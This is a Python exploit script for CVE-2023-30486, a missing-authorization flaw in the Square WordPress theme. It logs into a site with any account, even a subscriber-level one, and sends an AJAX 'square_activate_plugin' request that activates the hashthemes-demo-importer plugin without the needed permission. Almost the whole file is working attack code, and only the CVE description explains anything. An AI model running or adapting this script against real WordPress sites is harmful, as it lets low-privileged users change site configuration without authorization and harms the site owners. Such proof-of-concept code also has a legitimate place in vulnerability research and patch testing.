#!/usr/bin/env python3
import argparse
import requests
import re
from getpass import getpass
from bs4 import BeautifulSoup
import os

## Exploit script by @RandomRobbieBF

http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"



def vulncheck(url, username, password):


    # Login to WordPress
    login_url = f"{url}/wp-login.php"
    session = requests.Session()
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": f"{url}/wp-admin/",
    }

    try:
        login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent})
        login_response.raise_for_status()
        # Extract the required cookies from the response headers
        cookies = login_response.cookies

        # Confirm successful login
        if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
            print("Logged in successfully.")
        else:
            print("Failed to log in.")
            exit()

        payloads = [{"action":"square_activate_plugin","slug":"hashthemes-demo-importer","file":"hashthemes-demo-importer"}]
        
        main_url = f"{url}/wp-admin/admin-ajax.php"
        for payload in payloads:
            ajax_response = session.post(main_url,data=payload, headers={"User-Agent": user_agent,"X-Requested-With": "XMLHttpRequest"})
            ajax_response.raise_for_status()

            # Check if option set successfully
            if ajax_response.text == '{"success":true}':
                print(f"hashthemes-demo-importe installed")
            else:
                print(f"Failed to install hashthemes-demo-imported")
                exit()
    except:
        pass      


# Add the vulnerability description as a comment
DESCRIPTION = """
Square <= 2.0.0 - Missing Authorization via activate_plugin
Description:
CVE-2023-30486 The Square theme for WordPress is vulnerable to unauthorized plugin activation due to a missing capability check on the activate_plugin function called via an AJAX action in versions up to, and including, 2.0.0. This makes it possible for authenticated attackers , with subscriber-level access and above, to activate arbitrary plugins.
"""

# Use argparse to get the URL, username, and password arguments
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-u", "--url", help="Website URL", required=True)
parser.add_argument("-un", "--username", help="WordPress username")
parser.add_argument("-p", "--password", help="WordPress password")
args = parser.parse_args()

# Prompt for password if not provided as an argument
if not args.password:
    args.password = getpass("Enter the WordPress password: ")
vulncheck(args.url, args.username, args.password)